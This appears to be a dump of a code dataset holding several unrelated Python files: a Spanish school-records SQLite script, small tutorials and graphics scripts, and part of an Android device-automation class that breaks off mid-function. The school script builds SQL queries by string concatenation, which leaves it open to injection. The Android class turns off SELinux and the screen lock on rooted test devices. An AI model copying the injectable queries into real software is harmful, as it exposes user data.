favor digite un numero de los mencionados en la opcion\")\r\n menu()\r\n \r\ndef agregar():\r\n import os,sys,sqlite3\r\n con = sqlite3.connect('partes.s3db')\r\n print(\"Estas en el menu agregado\")\r\n print(\"\")\r\n\r\n name=input(\"Digite el nombre completo del Alumno: \")\r\n cui=input(\"Digite el cui del Alumno: \")\r\n os.system(\"cls\")\r\n cursor=con.cursor()\r\n cursor.execute(\"insert into grado (Nombre, Cui) values('\"+name+\"','\"+cui+\"')\")\r\n con.commit()\r\n con.close()\r\n menu()\r\ndef modificar():\r\n import os, sys, sqlite3\r\n grad=[]\r\n con=sqlite3.connect('partes.s3db')\r\n cursor=con.cursor()\r\n cursor.execute(\"select * from grado\")\r\n print(\"Estas en la opcion modificar alumnos\")\r\n print(\"\")\r\n print(\"\\t Cod \\t Nombre \\t CUI\")\r\n print(\"***************************************************************** \")\r\n for grado in cursor:\r\n grad.append(grado)\r\n grad='\\t'+str(grado[0])+'\\t'+str(grado[1])+'\\t'+str(grado[2])\r\n print(str(grad))\r\n print('')\r\n cod=input(\"DIGITE EL CODIDO DEL ALUMNO A MODIFICAR: \")\r\n global nombre\r\n global cui\r\n for grado in grad:\r\n if int(grado[0]==int(cod)):\r\n nombre=grado[1]\r\n cui=grado[2]\r\n encontrado=True\r\n break\r\n \r\n nombre=input(\"Digite el nombre nuevo\"+nombre+\": \")\r\n cui=input(\"Digite el CUI nuevo\"+str(cui)+\": \")\r\n sql=\"update grado set Nombre='\"+name+\"', CUI=\"+cui+\"' where Cod =\"+cod\r\n cursor.execute(sql)\r\n con.commit()\r\n con.close()\r\n os.sytem(\"cls\")\r\n print(\"El producto a sido modificado\")\r\n print(\"\")\r\n menu()\r\n \r\ndef ver():\r\n import os, sys, sqlite3\r\n con = sqlite3.connect('partes.s3db')\r\n cursor=con.cursor()\r\n cursor.execute(\"select * from grado\")\r\n print(\"Estas en la opcion ver alumnos\")\r\n print(\"\")\r\n print(\"\\t Cod \\t Nombre \\t CUI\")\r\n print(\"***************************************************************** \")\r\n for grado in cursor:\r\n grad='\\t'+str(grado[0])+'\\t'+str(grado[1])+'\\t'+str(grado[2])\r\n print(str(grad))\r\n con.close()\r\n print('')\r\n menu()\r\ndef salir():\r\n import sys\r\n res=input(\"Esta seguro que desea salir? SI/NO: \")\r\n if(res.lower()==\"no\"):\r\n menu()\r\n elif(res.lower()==\"si\"):\r\n import sys\r\n sys.exit(2)\r\n \r\nmenu()\r\n","sub_path":"escuela.py","file_name":"escuela.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"307726322","text":"''' Explains list comprehension which is much faster than looping through list '''\n''' The general method is this ' mylist = [ SOME_EXPRESION_WITH_i for i in ITERABLE_LIST ] '\n'''\n# Loop (slow)\niterer = list(range(10))\ndouble = list(range(10))\n\nmylist = []\nfor i in iterer:\n mylist.append(i+1)\n\nprint('Loop result',mylist)\n# List Comprehension (fast)\nmylist = [ i+1 for i in iterer]\nprint('List comprehension result',mylist)\n\n\n","sub_path":"ListComprehension.py","file_name":"ListComprehension.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"210445372","text":"import rhinoscriptsyntax as rs\n\n__author__ = \"C\"\n__version__ = \"2019.08.14\"\n__commandname__ = \"SDQT\"\n\n# RunCommand is the called when the user enters the command name in Rhino.\n# The command name is defined by the filname minus \"_cmd.py\"\ndef RunCommand( is_interactive ):\n # this script can turn off layers of your selected object\n\n rs.AddLayer(\"_t\")\n rs.CurrentLayer(\"_t\")\n\n Layers = []\n CurObjLayNames=[]\n CurObjLayParentNames=[]\n\n for layer in rs.LayerNames():\n if not rs.IsLayerLocked(layer):\n Layers.extend([layer])\n \n Layers = list(dict.fromkeys(Layers))\n\n\n\n CurObjs = rs.GetObjects(\"select object to keep layers on\")\n\n for CurObj in CurObjs:\n CurObjLayId = rs.ObjectLayer(CurObj)\n CurObjLayName = rs.LayerName(CurObjLayId, fullpath=True)\n CurObjLayNames.extend([CurObjLayName])\n CurObjLayNames = list(dict.fromkeys(CurObjLayNames))\n \n\n for name in CurObjLayNames:\n for layer in Layers:\n if rs.IsLayerParentOf(name,layer):\n CurObjLayParentNames.extend([layer])\n \n CurObjLayParentNames = list(dict.fromkeys(CurObjLayParentNames))\n\n layList = CurObjLayNames + CurObjLayParentNames\n\n i =0\n for layer in Layers:\n if layer not in layList and layer != \"_t\":\n rs.LayerLocked(layer,True)\n i += 1\n\n rs.MessageBox(str(i) + \" layers Locked\" , 0 , title=\"SDQT_Sandelions\")\n\n return 0\n","sub_path":"_cmd.py/SDQT_cmd.py","file_name":"SDQT_cmd.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"104367241","text":"import window\r\nfrom random import randint\r\nfrom quad import Quad\r\nfrom pygame.display import flip\r\nfrom pygame.time import Clock\r\nfrom OpenGL.GL import *\r\nfrom var import *\r\n\r\nwindow.window()\r\nevents=window.event_hendler\r\nfps=Clock()\r\nquads=[]\r\nquads_x={}\r\nquads_y={}\r\nfor i in range(QUAD_SPAWN):\r\n quads.append(Quad(randint(-960+QUAD_SIZE,960-QUAD_SIZE),randint(-540+QUAD_SIZE,540-QUAD_SIZE),i,i,[randint(-10000,10000)/10000,randint(-10000,10000)/10000]))\r\n quads_x.update({i:quads[i].x})\r\n quads_y.update({i:quads[i].y})\r\n\r\n'''def check_colisions(quads,quads_x,quads_y):\r\n for quad in quads:\r\n if quad.x+QUAD_SIZE<=list(quads_x.values())[quad.i_x+1] or quad.x-QUAD_SIZE<=list(quads_x.values())[quad.i_x-1]:\r\n pass\r\n if quad.y+QUAD_SIZE<=list(quads_y.values())[quad.i_y+1] or quad.y-QUAD_SIZE<=list(quads_y.values())[quad.i_y-1]:\r\n pass'''\r\n\r\n\r\n\r\n\r\ndef check_border(quads,quad_x_min,quad_x_max,quad_y_min,quad_y_max):\r\n if quads[quad_x_min].x<=-960+QUAD_SIZE:\r\n quads[quad_x_min].smer[0] = -quads[quad_x_min].smer[0]\r\n quads[quad_x_min].move()\r\n if quads[quad_x_max].x>=960-QUAD_SIZE:\r\n quads[quad_x_max].smer[0] = -quads[quad_x_max].smer[0]\r\n quads[quad_x_max].move()\r\n if quads[quad_y_min].y<=-540+QUAD_SIZE:\r\n quads[quad_y_min].smer[1] = -quads[quad_y_min].smer[1]\r\n quads[quad_y_min].move()\r\n if quads[quad_y_max].y>=540-QUAD_SIZE:\r\n quads[quad_y_max].smer[1] = -quads[quad_y_max].smer[1]\r\n quads[quad_y_min].move()\r\n\r\ndef sort_x(quads_x):\r\n return {key: value for key, value in sorted(quads_x.items(), key=lambda item: item[1])}\r\n\r\ndef sort_y(quads_y):\r\n return {key: value for key, value in sorted(quads_y.items(), key=lambda item: item[1])}\r\n\r\ndef update(quads, quads_x, quads_y):\r\n quads_x = {}\r\n quads_y = {}\r\n for i in range(QUAD_SPAWN):\r\n quads_x.update({i: quads[i].x})\r\n quads_y.update({i: quads[i].y})\r\n quads_x=sort_x(quads_x)\r\n quads_y=sort_y(quads_y)\r\n return (quads_x, quads_y)\r\n\r\ndef draw():\r\n for quad in quads:\r\n quad.draw()\r\n flip()\r\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\r\n\r\nwhile True:\r\n events()\r\n draw()\r\n for quad in quads:\r\n quad.move()\r\n quads_x, quads_y=update(quads,quads_x,quads_y)\r\n check_border(quads,int(list(quads_x.keys())[0]),int(list(quads_x.keys())[len(quads_x)-1]),int(list(quads_y.keys())[0]),int(list(quads_y.keys())[len(quads_y)-1]))\r\n fps.tick(120)","sub_path":"Tauchen/18.12.2019/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"456388821","text":"# Copyright 2013-2015 ARM Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n# pylint: disable=E1101\nimport os\nimport sys\nimport re\nimport time\nimport tempfile\nimport shutil\nimport threading\nimport json\nimport xml.dom.minidom\nfrom subprocess import CalledProcessError\n\nfrom wlauto.core.extension import Parameter\nfrom wlauto.common.resources import Executable\nfrom wlauto.core.resource import NO_ONE\nfrom wlauto.common.linux.device import BaseLinuxDevice, PsEntry\nfrom wlauto.exceptions import DeviceError, WorkerThreadError, TimeoutError, DeviceNotRespondingError\nfrom wlauto.utils.misc import convert_new_lines, ABI_MAP, commonprefix\nfrom wlauto.utils.types import boolean, regex\nfrom wlauto.utils.android import (adb_shell, adb_background_shell, adb_list_devices,\n adb_command, AndroidProperties, ANDROID_VERSION_MAP)\n\n\nSCREEN_STATE_REGEX = re.compile('(?:mPowerState|mScreenOn|Display Power: state)=([0-9]+|true|false|ON|OFF)', re.I)\nSCREEN_SIZE_REGEX = re.compile(r'mUnrestrictedScreen=\\(\\d+,\\d+\\)\\s+(?P\\d+)x(?P\\d+)')\n\n\nclass AndroidDevice(BaseLinuxDevice): # pylint: disable=W0223\n \"\"\"\n Device running Android OS.\n\n \"\"\"\n\n platform = 'android'\n\n parameters = [\n Parameter('adb_name',\n description='The unique ID of the device as output by \"adb devices\".'),\n Parameter('android_prompt', kind=regex, default=re.compile('^.*(shell|root)@.*:/\\S* [#$] ', re.MULTILINE),\n description='The format of matching the shell prompt in Android.'),\n Parameter('working_directory', default='/sdcard/wa-working', override=True),\n Parameter('binaries_directory', default='/data/local/tmp/wa-bin', override=True,\n description='Location of binaries on the device.'),\n Parameter('package_data_directory', default='/data/data',\n description='Location of of data for an installed package (APK).'),\n Parameter('external_storage_directory', default='/sdcard',\n description='Mount point for external storage.'),\n Parameter('connection', default='usb', allowed_values=['usb', 'ethernet'],\n description='Specified the nature of adb connection.'),\n Parameter('logcat_poll_period', kind=int,\n description=\"\"\"\n If specified and is not ``0``, logcat will be polled every\n ``logcat_poll_period`` seconds, and buffered on the host. This\n can be used if a lot of output is expected in logcat and the fixed\n logcat buffer on the device is not big enough. The trade off is that\n this introduces some minor runtime overhead. Not set by default.\n \"\"\"),\n Parameter('enable_screen_check', kind=boolean, default=False,\n description=\"\"\"\n Specified whether the device should make sure that the screen is on\n during initialization.\n \"\"\"),\n Parameter('swipe_to_unlock', kind=str, default=None,\n allowed_values=[None, \"horizontal\", \"vertical\"],\n description=\"\"\"\n If set a swipe of the specified direction will be performed.\n This should unlock the screen.\n \"\"\"),\n ]\n\n default_timeout = 30\n delay = 2\n long_delay = 3 * delay\n ready_timeout = 60\n\n # Overwritten from Device. For documentation, see corresponding method in\n # Device.\n\n @property\n def is_rooted(self):\n if self._is_rooted is None:\n try:\n result = adb_shell(self.adb_name, 'su', timeout=1)\n if 'not found' in result:\n self._is_rooted = False\n else:\n self._is_rooted = True\n except TimeoutError:\n self._is_rooted = True\n except DeviceError:\n self._is_rooted = False\n return self._is_rooted\n\n @property\n def abi(self):\n val = self.getprop()['ro.product.cpu.abi'].split('-')[0]\n for abi, architectures in ABI_MAP.iteritems():\n if val in architectures:\n return abi\n return val\n\n @property\n def supported_abi(self):\n props = self.getprop()\n result = [props['ro.product.cpu.abi']]\n if 'ro.product.cpu.abi2' in props:\n result.append(props['ro.product.cpu.abi2'])\n if 'ro.product.cpu.abilist' in props:\n for abi in props['ro.product.cpu.abilist'].split(','):\n if abi not in result:\n result.append(abi)\n\n mapped_result = []\n for supported_abi in result:\n for abi, architectures in ABI_MAP.iteritems():\n found = False\n if supported_abi in architectures and abi not in mapped_result:\n mapped_result.append(abi)\n found = True\n break\n if not found and supported_abi not in mapped_result:\n mapped_result.append(supported_abi)\n return mapped_result\n\n def __init__(self, **kwargs):\n super(AndroidDevice, self).__init__(**kwargs)\n self._logcat_poller = None\n\n def reset(self):\n self._is_ready = False\n self._just_rebooted = True\n adb_command(self.adb_name, 'reboot', timeout=self.default_timeout)\n\n def hard_reset(self):\n super(AndroidDevice, self).hard_reset()\n self._is_ready = False\n self._just_rebooted = True\n\n def boot(self, hard=False, **kwargs):\n if hard:\n self.hard_reset()\n else:\n self.reset()\n\n def connect(self): # NOQA pylint: disable=R0912\n iteration_number = 0\n max_iterations = self.ready_timeout / self.delay\n available = False\n self.logger.debug('Polling for device {}...'.format(self.adb_name))\n while iteration_number < max_iterations:\n devices = adb_list_devices()\n if self.adb_name:\n for device in devices:\n if device.name == self.adb_name and device.status != 'offline':\n available = True\n else: # adb_name not set\n if len(devices) == 1:\n available = True\n elif len(devices) > 1:\n raise DeviceError('More than one device is connected and adb_name is not set.')\n\n if available:\n break\n else:\n time.sleep(self.delay)\n iteration_number += 1\n else:\n raise DeviceError('Could not boot {} ({}).'.format(self.name, self.adb_name))\n\n while iteration_number < max_iterations:\n available = (int('0' + (adb_shell(self.adb_name, 'getprop sys.boot_completed', timeout=self.default_timeout))) == 1)\n if available:\n break\n else:\n time.sleep(self.delay)\n iteration_number += 1\n else:\n raise DeviceError('Could not boot {} ({}).'.format(self.name, self.adb_name))\n\n if self._just_rebooted:\n self.logger.debug('Waiting for boot to complete...')\n # On some devices, adb connection gets reset some time after booting.\n # This causes errors during execution. To prevent this, open a shell\n # session and wait for it to be killed. Once its killed, give adb\n # enough time to restart, and then the device should be ready.\n # TODO: This is more of a work-around rather than an actual solution.\n # Need to figure out what is going on the \"proper\" way of handling it.\n try:\n adb_shell(self.adb_name, '', timeout=20)\n time.sleep(5) # give adb time to re-initialize\n except TimeoutError:\n pass # timed out waiting for the session to be killed -- assume not going to be.\n\n self.logger.debug('Boot completed.')\n self._just_rebooted = False\n self._is_ready = True\n\n def initialize(self, context):\n self.sqlite = self.deploy_sqlite3(context) # pylint: disable=attribute-defined-outside-init\n if self.is_rooted:\n self.disable_screen_lock()\n self.disable_selinux()\n if self.enable_screen_check:\n self.ensure_screen_is_on()\n\n def disconnect(self):\n if self._logcat_poller:\n self._logcat_poller.close()\n\n def ping(self):\n try:\n # May be triggered inside initialize()\n adb_shell(self.adb_name, 'ls /', timeout=10)\n except (TimeoutError, CalledProcessError):\n raise DeviceNotRespondingError(self.adb_name or self.name)\n\n def start(self):\n if self.logcat_poll_period:\n if self._logcat_poller:\n self._logcat_poller.close()\n self._logcat_poller = _LogcatPoller(self, self.logcat_poll_period, timeout=self.default_timeout)\n self._logcat_poller.start()\n\n def stop(self):\n if self._logcat_poller:\n self._logcat_poller.stop()\n\n def get_android_version(self):\n return ANDROID_VERSION_MAP.get(self.get_sdk_version(), None)\n\n def get_android_id(self):\n \"\"\"\n Get the device's ANDROID_ID. Which is\n\n \"A 64-bit number (as a hex string) that is randomly generated when the user\n first sets up the device and should remain constant for the lifetime of the\n user's device.\"\n\n .. note:: This will get reset on userdata erasure.\n\n \"\"\"\n output = self.execute('content query --uri content://settings/secure --projection value --where \"name=\\'android_id\\'\"').strip()\n return output.split('value=')[-1]\n\n def get_sdk_version(self):\n try:\n return int(self.getprop('ro.build.version.sdk'))\n except (ValueError, TypeError):\n return None\n\n def get_installed_package_version(self, package):\n \"\"\"\n Returns the version (versionName) of the specified package if it is installed\n on the device, or ``None`` otherwise.\n\n Added in version 2.1.4\n\n \"\"\"\n output = self.execute('dumpsys package {}'.format(package))\n for line in convert_new_lines(output).split('\\n'):\n if 'versionName' in line:\n return line.split('=', 1)[1]\n return None\n\n def get_installed_package_abi(self, package):\n \"\"\"\n Returns the primary abi of the specified package if it is installed\n on the device, or ``None`` otherwise.\n \"\"\"\n output = self.execute('dumpsys package {}'.format(package))\n val = None\n for line in convert_new_lines(output).split('\\n'):\n if 'primaryCpuAbi' in line:\n val = line.split('=', 1)[1]\n break\n if val == 'null':\n return None\n for abi, architectures in ABI_MAP.iteritems():\n if val in architectures:\n return abi\n return val\n\n def list_packages(self):\n \"\"\"\n List packages installed on the device.\n\n Added in version 2.1.4\n\n \"\"\"\n output = self.execute('pm list packages')\n output = output.replace('package:', '')\n return output.split()\n\n def package_is_installed(self, package_name):\n \"\"\"\n Returns ``True`` the if a package with the specified name is installed on\n the device, and ``False`` otherwise.\n\n Added in version 2.1.4\n\n \"\"\"\n return package_name in self.list_packages()\n\n def executable_is_installed(self, executable_name): # pylint: disable=unused-argument,no-self-use\n raise AttributeError(\"\"\"Instead of using is_installed, please use\n ``get_binary_path`` or ``install_if_needed`` instead. You should\n use the path returned by these functions to then invoke the binary\n\n please see: https://pythonhosted.org/wlauto/writing_extensions.html\"\"\")\n\n def is_installed(self, name):\n if self.package_is_installed(name):\n return True\n elif \".\" in name: # assumes android packages have a . in their name and binaries documentation\n return False\n else:\n raise AttributeError(\"\"\"Instead of using is_installed, please use\n ``get_binary_path`` or ``install_if_needed`` instead. You should\n use the path returned by these functions to then invoke the binary\n\n please see: https://pythonhosted.org/wlauto/writing_extensions.html\"\"\")\n\n def listdir(self, path, as_root=False, **kwargs):\n contents = self.execute('ls {}'.format(path), as_root=as_root)\n return [x.strip() for x in contents.split()]\n\n def push_file(self, source, dest, as_root=False, timeout=default_timeout): # pylint: disable=W0221\n \"\"\"\n Modified in version 2.1.4: added ``as_root`` parameter.\n\n \"\"\"\n self._check_ready()\n try:\n if not as_root:\n adb_command(self.adb_name, \"push '{}' '{}'\".format(source, dest), timeout=timeout)\n else:\n device_tempfile = self.path.join(self.file_transfer_cache, source.lstrip(self.path.sep))\n self.execute('mkdir -p {}'.format(self.path.dirname(device_tempfile)))\n adb_command(self.adb_name, \"push '{}' '{}'\".format(source, device_tempfile), timeout=timeout)\n self.execute('cp {} {}'.format(device_tempfile, dest), as_root=True)\n except CalledProcessError as e:\n raise DeviceError(e)\n\n def pull_file(self, source, dest, as_root=False, timeout=default_timeout): # pylint: disable=W0221\n \"\"\"\n Modified in version 2.1.4: added ``as_root`` parameter.\n\n \"\"\"\n self._check_ready()\n try:\n if not as_root:\n adb_command(self.adb_name, \"pull '{}' '{}'\".format(source, dest), timeout=timeout)\n else:\n device_tempfile = self.path.join(self.file_transfer_cache, source.lstrip(self.path.sep))\n self.execute('mkdir -p {}'.format(self.path.dirname(device_tempfile)))\n self.execute('cp {} {}'.format(source, device_tempfile), as_root=True)\n adb_command(self.adb_name, \"pull '{}' '{}'\".format(device_tempfile, dest), timeout=timeout)\n except CalledProcessError as e:\n raise DeviceError(e)\n\n def delete_file(self, filepath, as_root=False): # pylint: disable=W0221\n self._check_ready()\n adb_shell(self.adb_name, \"rm -rf '{}'\".format(filepath), as_root=as_root, timeout=self.default_timeout)\n\n def file_exists(self, filepath):\n self._check_ready()\n output = adb_shell(self.adb_name, 'if [ -e \\'{}\\' ]; then echo 1; else echo 0; fi'.format(filepath),\n timeout=self.default_timeout)\n return bool(int(output))\n\n def install(self, filepath, timeout=default_timeout, with_name=None, replace=False): # pylint: disable=W0221\n ext = os.path.splitext(filepath)[1].lower()\n if ext == '.apk':\n return self.install_apk(filepath, timeout, replace)\n else:\n return self.install_executable(filepath, with_name)\n\n def install_apk(self, filepath, timeout=300, replace=False, allow_downgrade=False): # pylint: disable=W0221\n self._check_ready()\n ext = os.path.splitext(filepath)[1].lower()\n if ext == '.apk':\n flags = []\n if replace:\n flags.append('-r') # Replace existing APK\n if allow_downgrade:\n flags.append('-d') # Install the APK even if a newer version is already installed\n if self.get_sdk_version() >= 23:\n flags.append('-g') # Grant all runtime permissions\n self.logger.debug(\"Replace APK = {}, ADB flags = '{}'\".format(replace, ' '.join(flags)))\n return adb_command(self.adb_name, \"install {} '{}'\".format(' '.join(flags), filepath), timeout=timeout)\n else:\n raise DeviceError('Can\\'t install {}: unsupported format.'.format(filepath))\n\n def install_executable(self, filepath, with_name=None):\n \"\"\"\n Installs a binary executable on device. Returns\n the path to the installed binary, or ``None`` if the installation has failed.\n Optionally, ``with_name`` parameter may be used to specify a different name under\n which the executable will be installed.\n\n Added in version 2.1.3.\n Updated in version 2.1.5 with ``with_name`` parameter.\n\n \"\"\"\n self._ensure_binaries_directory_is_writable()\n executable_name = with_name or os.path.basename(filepath)\n on_device_file = self.path.join(self.working_directory, executable_name)\n on_device_executable = self.path.join(self.binaries_directory, executable_name)\n self.push_file(filepath, on_device_file)\n self.execute('cp {} {}'.format(on_device_file, on_device_executable), as_root=self.is_rooted)\n self.execute('chmod 0777 {}'.format(on_device_executable), as_root=self.is_rooted)\n return on_device_executable\n\n def uninstall(self, package):\n self._check_ready()\n adb_command(self.adb_name, \"uninstall {}\".format(package), timeout=self.default_timeout)\n\n def uninstall_executable(self, executable_name):\n \"\"\"\n\n Added in version 2.1.3.\n\n \"\"\"\n on_device_executable = self.get_binary_path(executable_name, search_system_binaries=False)\n if not on_device_executable:\n raise DeviceError(\"Could not uninstall {}, binary not found\".format(on_device_executable))\n self._ensure_binaries_directory_is_writable()\n self.delete_file(on_device_executable, as_root=self.is_rooted)\n\n def execute(self, command, timeout=default_timeout, check_exit_code=True, background=False,\n as_root=False, busybox=False, **kwargs):\n \"\"\"\n Execute the specified command on the device using adb.\n\n Parameters:\n\n :param command: The command to be executed. It should appear exactly\n as if you were typing it into a shell.\n :param timeout: Time, in seconds, to wait for adb to return before aborting\n and raising an error. Defaults to ``AndroidDevice.default_timeout``.\n :param check_exit_code: If ``True``, the return code of the command on the Device will\n be check and exception will be raised if it is not 0.\n Defaults to ``True``.\n :param background: If ``True``, will execute adb in a subprocess, and will return\n immediately, not waiting for adb to return. Defaults to ``False``\n :param busybox: If ``True``, will use busybox to execute the command. Defaults to ``False``.\n\n Added in version 2.1.3\n\n .. note:: The device must be rooted to be able to use some busybox features.\n\n :param as_root: If ``True``, will attempt to execute command in privileged mode. The device\n must be rooted, otherwise an error will be raised. Defaults to ``False``.\n\n Added in version 2.1.3\n\n :returns: If ``background`` parameter is set to ``True``, the subprocess object will\n be returned; otherwise, the contents of STDOUT from the device will be returned.\n\n :raises: DeviceError if adb timed out or if the command returned non-zero exit\n code on the device, or if attempting to execute a command in privileged mode on an\n unrooted device.\n\n \"\"\"\n self._check_ready()\n if as_root and not self.is_rooted:\n raise DeviceError('Attempting to execute \"{}\" as root on unrooted device.'.format(command))\n if busybox:\n command = ' '.join([self.busybox, command])\n if background:\n return adb_background_shell(self.adb_name, command, as_root=as_root)\n else:\n return adb_shell(self.adb_name, command, timeout, check_exit_code, as_root)\n\n def kick_off(self, command, as_root=None):\n \"\"\"\n Like execute but closes adb session and returns immediately, leaving the command running on the\n device (this is different from execute(background=True) which keeps adb connection open and returns\n a subprocess object).\n\n Added in version 2.1.4\n\n \"\"\"\n if as_root is None:\n as_root = self.is_rooted\n try:\n command = 'cd {} && {} nohup {}'.format(self.working_directory, self.busybox, command)\n output = self.execute(command, timeout=1, as_root=as_root)\n except TimeoutError:\n pass\n else:\n raise ValueError('Background command exited before timeout; got \"{}\"'.format(output))\n\n def get_pids_of(self, process_name):\n \"\"\"Returns a list of PIDs of all processes with the specified name.\"\"\"\n result = (self.execute('ps | {} grep {}'.format(self.busybox, process_name),\n check_exit_code=False) or '').strip()\n if result and 'not found' not in result:\n return [int(x.split()[1]) for x in result.split('\\n')]\n else:\n return []\n\n def ps(self, **kwargs):\n \"\"\"\n Returns the list of running processes on the device. Keyword arguments may\n be used to specify simple filters for columns.\n\n Added in version 2.1.4\n\n \"\"\"\n lines = iter(convert_new_lines(self.execute('ps')).split('\\n'))\n lines.next() # header\n result = []\n for line in lines:\n parts = line.split()\n if parts:\n result.append(PsEntry(*(parts[0:1] + map(int, parts[1:5]) + parts[5:])))\n if not kwargs:\n return result\n else:\n filtered_result = []\n for entry in result:\n if all(getattr(entry, k) == v for k, v in kwargs.iteritems()):\n filtered_result.append(entry)\n return filtered_result\n\n def get_properties(self, context):\n \"\"\"Captures and saves the information from /system/build.prop and /proc/version\"\"\"\n props = super(AndroidDevice, self).get_properties(context)\n props.update(self._get_android_properties(context))\n return props\n\n def _get_android_properties(self, context):\n props = {}\n props['android_id'] = self.get_android_id()\n self._update_build_properties(props)\n\n dumpsys_host_file = os.path.join(context.host_working_directory, 'window.dumpsys')\n with open(dumpsys_host_file, 'w') as wfh:\n wfh.write(self.execute('dumpsys window'))\n context.add_run_artifact('dumpsys_window', dumpsys_host_file, 'meta')\n\n prop_file = os.path.join(context.host_working_directory, 'android-props.json')\n with open(prop_file, 'w') as wfh:\n json.dump(props, wfh)\n context.add_run_artifact('android_properties', prop_file, 'export')\n return props\n\n def getprop(self, prop=None):\n \"\"\"Returns parsed output of Android getprop command. If a property is\n specified, only the value for that property will be returned (with\n ``None`` returned if the property doesn't exist. Otherwise,\n ``wlauto.utils.android.AndroidProperties`` will be returned, which is\n a dict-like object.\"\"\"\n props = AndroidProperties(self.execute('getprop'))\n if prop:\n return props[prop]\n return props\n\n def deploy_sqlite3(self, context):\n host_file = context.resolver.get(Executable(NO_ONE, self.abi, 'sqlite3'))\n target_file = self.install_if_needed(host_file)\n return target_file\n\n # Android-specific methods. These either rely on specifics of adb or other\n # Android-only concepts in their interface and/or implementation.\n\n def forward_port(self, from_port, to_port):\n \"\"\"\n Forward a port on the device to a port on localhost.\n\n :param from_port: Port on the device which to forward.\n :param to_port: Port on the localhost to which the device port will be forwarded.\n\n Ports should be specified using adb spec. See the \"adb forward\" section in \"adb help\".\n\n \"\"\"\n adb_command(self.adb_name, 'forward {} {}'.format(from_port, to_port), timeout=self.default_timeout)\n\n def dump_logcat(self, outfile, filter_spec=None):\n \"\"\"\n Dump the contents of logcat, for the specified filter spec to the\n specified output file.\n See http://developer.android.com/tools/help/logcat.html\n\n :param outfile: Output file on the host into which the contents of the\n log will be written.\n :param filter_spec: Logcat filter specification.\n see http://developer.android.com/tools/debugging/debugging-log.html#filteringOutput\n\n \"\"\"\n if self._logcat_poller:\n return self._logcat_poller.write_log(outfile)\n else:\n if filter_spec:\n command = 'logcat -d -s {} > {}'.format(filter_spec, outfile)\n else:\n command = 'logcat -d > {}'.format(outfile)\n return adb_command(self.adb_name, command, timeout=self.default_timeout)\n\n def clear_logcat(self):\n \"\"\"Clear (flush) logcat log.\"\"\"\n if self._logcat_poller:\n return self._logcat_poller.clear_buffer()\n else:\n return adb_shell(self.adb_name, 'logcat -c', timeout=self.default_timeout)\n\n def get_screen_size(self):\n output = self.execute('dumpsys window')\n match = SCREEN_SIZE_REGEX.search(output)\n if match:\n return (int(match.group('width')),\n int(match.group('height')))\n else:\n return (0, 0)\n\n def perform_unlock_swipe(self):\n width, height = self.get_screen_size()\n command = 'input swipe {} {} {} {}'\n if self.swipe_to_unlock == \"horizontal\":\n swipe_heigh = height * 2 // 3\n start = 100\n stop = width - start\n self.execute(command.format(start, swipe_heigh, stop, swipe_heigh))\n if self.swipe_to_unlock == \"vertical\":\n swipe_middle = height / 2\n swipe_heigh = height * 2 // 3\n self.execute(command.format(swipe_middle, swipe_heigh, swipe_middle, 0))\n else: # Should never reach here\n raise DeviceError(\"Invalid swipe direction: {}\".format(self.swipe_to_unlock))\n\n def capture_screen(self, filepath):\n \"\"\"Caputers the current device screen into the specified file in a PNG format.\"\"\"\n on_device_file = self.path.join(self.working_directory, 'screen_capture.png')\n self.execute('screencap -p {}'.format(on_device_file))\n self.pull_file(on_device_file, filepath)\n self.delete_file(on_device_file)\n\n def capture_ui_hierarchy(self, filepath):\n \"\"\"Captures the current view hierarchy into the specified file in a XML format.\"\"\"\n on_device_file = self.path.join(self.working_directory, 'screen_capture.xml')\n self.execute('uiautomator dump {}'.format(on_device_file))\n self.pull_file(on_device_file, filepath)\n self.delete_file(on_device_file)\n\n parsed_xml = xml.dom.minidom.parse(filepath)\n with open(filepath, 'w') as f:\n f.write(parsed_xml.toprettyxml())\n\n def is_screen_on(self):\n \"\"\"Returns ``True`` if the device screen is currently on, ``False`` otherwise.\"\"\"\n output = self.execute('dumpsys power')\n match = SCREEN_STATE_REGEX.search(output)\n if match:\n return boolean(match.group(1))\n else:\n raise DeviceError('Could not establish screen state.')\n\n def ensure_screen_is_on(self):\n if not self.is_screen_on():\n self.execute('input keyevent 26')\n if self.swipe_to_unlock:\n self.perform_unlock_swipe()\n\n def disable_screen_lock(self):\n \"\"\"\n Attempts to disable he screen lock on the device.\n\n .. note:: This does not always work...\n\n Added inversion 2.1.4\n\n \"\"\"\n lockdb = '/data/system/locksettings.db'\n sqlcommand = \"update locksettings set value='0' where name='screenlock.disabled';\"\n f = tempfile.NamedTemporaryFile()\n try:\n f.write('{} {} \"{}\"'.format(self.sqlite, lockdb, sqlcommand))\n f.flush()\n on_device_executable = self.install_executable(f.name,\n with_name=\"disable_screen_lock\")\n finally:\n f.close()\n self.execute(on_device_executable, as_root=True)\n\n def disable_selinux(self):\n # This may be invoked from intialize() so we can't use execute() or the\n # standard API for doing this.\n api_level = int(adb_shell(self.adb_name, 'getprop ro.build.version.sdk',\n timeout=self.default_timeout).strip())\n # SELinux was added in Android 4.3 (API level 18). Trying to\n # 'getenforce' in earlier versions will produce an error.\n if api_level >= 18:\n se_status = self.execute('getenforce', as_root=True).strip()\n if se_status == 'Enforcing':\n self.execute('setenforce 0', as_root=True)\n\n def get_device_model(self):\n try:\n return self.getprop(prop='ro.product.device')\n except KeyError:\n return None\n\n def refresh_device_files(self, file_list):\n \"\"\"\n Depending on the devices android version and root status, determine the\n appropriate method of forcing a re-index of the mediaserver cache for a given\n list of files.\n \"\"\"\n if self.device.is_rooted or 